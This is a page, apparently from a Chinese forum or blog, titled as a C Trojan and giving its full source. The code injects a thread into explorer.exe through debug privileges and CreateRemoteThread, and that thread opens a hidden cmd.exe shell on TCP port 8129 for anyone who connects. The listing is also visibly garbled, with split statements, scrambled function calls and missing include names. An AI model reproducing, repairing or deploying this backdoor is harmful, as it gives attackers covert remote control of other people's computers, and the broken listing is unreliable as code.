C语言编写的木马程序(源代码附上)

#include

#pragma comment(lib,\"ws2_32.lib\")

#include

#include

#pragma comment(lib,\"Shlwapi.lib\")

#include

#include

#include

//参数结构 ;

typedef struct _RemotePara

{

DWORD dwLoadLibrary;

DWORD dwFreeLibrary;

DWORD dwGetProcAddress;

DWORD dwGetModuleHandle;

DWORD dwWSAStartup;

DWORD dwSocket;

DWORD dwhtons;

DWORD dwbind;

DWORD dwlisten;

DWORD dwaccept;

DWORD dwsend;

DWORD dwrecv;

DWORD dwclosesocket;

DWORD dwCreateProcessA;

DWORD dwPeekNamedPipe;

DWORD dwWriteFile;

DWORD dwReadFile;

DWORD dwCloseHandle;

DWORD dwCreatePipe;

DWORD dwTerminateProcess;

DWORD dwMessageBox;

char strMessageBox[12];

char winsockDll[16];

char cmd[10];

char Buff[4096];

char telnetmsg[60];

}RemotePara;

// 提升应用级调试权限

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);

// 根据进程名称得到进程ID

DWORD GetPidByName(char *szName);

// 远程线程执行体

DWORD __stdcall ThreadProc(RemotePara *Para)

{

WSADATA WSAData;

WORD nVersion;

SOCKET listenSocket;

SOCKET clientSocket;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int iAddrSize = sizeof(client_addr);

SECURITY_ATTRIBUTES sa;

HANDLE hReadPipe1;

HANDLE hWritePipe1;

HANDLE hReadPipe2;

HANDLE hWritePipe2;

STARTUPINFO si;

PROCESS_INFORMATION ProcessInformation;

unsigned long lBytesRead = 0;

typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);

typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);

typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );

typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

FARPROC PMessageBoxA;

FARPROC PWSAStartup;

FARPROC PSocket;

FARPROC Phtons;

FARPROC Pbind;

FARPROC Plisten;

FARPROC Paccept;

FARPROC Psend;

FARPROC Precv;

FARPROC Pclosesocket;

FARPROC PCreateProcessA;

FARPROC PPeekNamedPipe;

FARPROC PWriteFile;

FARPROC PReadFile;

FARPROC PCloseHandle;

FARPROC PCreatePipe;

FARPROC PTerminateProcess;

PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;

PGetProcAddress GetProcAddressFunc (PGetProcAddress)Para->dwGetProcAddress;

PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;

PGetModuleHandle GetModuleHandleFunc (PGetModuleHandle)Para->dwGetModuleHandle;

LoadLibraryFunc(Para->winsockDll);

PWSAStartup = (FARPROC)Para->dwWSAStartup;

PSocket = (FARPROC)Para->dwSocket;

Phtons = (FARPROC)Para->dwhtons;

Pbind = (FARPROC)Para->dwbind;

=

=

Plisten = (FARPROC)Para->dwlisten;

Paccept = (FARPROC)Para->dwaccept;

Psend = (FARPROC)Para->dwsend;

Precv = (FARPROC)Para->dwrecv;

Pclosesocket = (FARPROC)Para->dwclosesocket;

PCreateProcessA = (FARPROC)Para->dwCreateProcessA;

PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe;

PWriteFile = (FARPROC)Para->dwWriteFile;

PReadFile = (FARPROC)Para->dwReadFile;

PCloseHandle = (FARPROC)Para->dwCloseHandle;

PCreatePipe = (FARPROC)Para->dwCreatePipe;

PTerminateProcess = (FARPROC)Para->dwTerminateProcess;

PMessageBoxA = (FARPROC)Para->dwMessageBox;

nVersion = MAKEWORD(2,1);

PWSAStartup(nVersion, (LPWSADATA)&WSAData);

listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);

if(listenSocket == INVALID_SOCKET)return 0;

server_addr.sin_family = AF_INET;

server_addr.sin_port = Phtons((unsigned short)(8129));

server_addr.sin_addr.s_addr = INADDR_ANY;

if(Pbind(listenSocket, (struct sockaddr *)&server_addr,

sizeof(SOCKADDR_IN)) != 0)return 0;

if(Plisten(listenSocket, 5))return 0;

clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);

// Psend(clientSocket, Para->telnetmsg, 60, 0);

if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;

if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;

ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数，可以直接调用

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

si.wShowWindow = SW_HIDE;

si.hStdInput = hReadPipe2;

si.hStdOutput = si.hStdError = hWritePipe1;

if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;

while(1) {

memset(Para->Buff,0,4096);

PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);

if(lBytesRead) {

if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;

if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;

}else {

lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);

if(lBytesRead <=0 ) break;

if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;

}

}

PCloseHandle(hWritePipe2);

PCloseHandle(hReadPipe1);

PCloseHandle(hReadPipe2);

PCloseHandle(hWritePipe1);

Pclosesocket(listenSocket);

Pclosesocket(clientSocket);

// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox,

MB_OK);

return 0;

}

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR lpCmdLine,

int nCmdShow)

{

const DWORD THREADSIZE=1024*4;

DWORD byte_write;

void *pRemoteThread;

HANDLE hToken,hRemoteProcess,hThread;

HINSTANCE hKernel,hUser32,hSock;

RemotePara myRemotePara,*pRemotePara;

DWORD pID;

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);

EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

// 获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS

pID = GetPidByName(\"EXPLORER.EXE\");

if(pID == 0)return 0;

hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);

if(!hRemoteProcess)return 0;

// 在远程进程地址空间分配虚拟内存

pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE,

MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

if(!pRemoteThread)return 0;

// 将线程执行体ThreadProc写入远程进程

if(!WriteProcessMemory(hRemoteProcess, THREADSIZE,0))return 0;

pRemoteThread, &ThreadProc,

ZeroMemory(&myRemotePara,sizeof(RemotePara));

hKernel = LoadLibrary( \"kernel32.dll\");

myRemotePara.dwLoadLibrary \"LoadLibraryA\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwFreeLibrary \"FreeLibrary\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, \"GetProcAddress\");

myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, \"GetModuleHandleA\");

myRemotePara.dwCreateProcessA \"CreateProcessA\");

= (DWORD)GetProcAddress(hKernel,

myRemotePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, \"PeekNamedPipe\");

myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel,

\"WriteFile\");

myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, \"ReadFile\");

myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, \"CloseHandle\");

myRemotePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, \"CreatePipe\");

myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, \"TerminateProcess\");

hSock = LoadLibrary(\"wsock32.dll\");

myRemotePara.dwWSAStartup

(DWORD)GetProcAddress(hSock,\"WSAStartup\");

=

myRemotePara.dwSocket = (DWORD)GetProcAddress(hSock,\"socket\");

myRemotePara.dwhtons = (DWORD)GetProcAddress(hSock,\"htons\");

myRemotePara.dwbind = (DWORD)GetProcAddress(hSock,\"bind\");

myRemotePara.dwlisten = (DWORD)GetProcAddress(hSock,\"listen\");

myRemotePara.dwaccept = (DWORD)GetProcAddress(hSock,\"accept\");

myRemotePara.dwrecv = (DWORD)GetProcAddress(hSock,\"recv\");

myRemotePara.dwsend = (DWORD)GetProcAddress(hSock,\"send\");

myRemotePara.dwclosesocket

(DWORD)GetProcAddress(hSock,\"closesocket\");

=

hUser32 = LoadLibrary(\"user32.dll\");

myRemotePara.dwMessageBox \"MessageBoxA\");

= (DWORD)GetProcAddress(hUser32,

strcat(myRemotePara.strMessageBox,\"Sucess!\\\\0\");

strcat(myRemotePara.winsockDll,\"wsock32.dll\\\\0\");

strcat(myRemotePara.cmd,\"cmd.exe\\\\0\");

strcat(myRemotePara.telnetmsg,\"Connect Sucessful!\\\\n\\\\0\");

//写进目标进程

pRemotePara =(RemotePara *)VirtualAllocEx

(hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);

if(!pRemotePara)return 0;

if(!WriteProcessMemory

(hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

// 启动线程

hThread = CreateRemoteThread(hRemoteProcess *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);

while(1) {}

FreeLibrary(hKernel);

FreeLibrary(hSock);

FreeLibrary(hUser32);

CloseHandle(hRemoteProcess);

CloseHandle(hToken);

return 0;

}

,0,0,(DWORD (__stdcall

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);

return((GetLastError() == ERROR_SUCCESS));

}

DWORD GetPidByName(char *szName)

{

HANDLE hProcessSnap = INVALID_HANDLE_VALUE;

PROCESSENTRY32 pe32={0};

DWORD dwRet=0;

hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if(Process32First(hProcessSnap, &pe32))

{

do

{

if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)

{

dwRet=pe32.th32ProcessID;

break;

}

}while (Process32Next(hProcessSnap,&pe32));

}

else return 0;

if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);

return dwRet;

}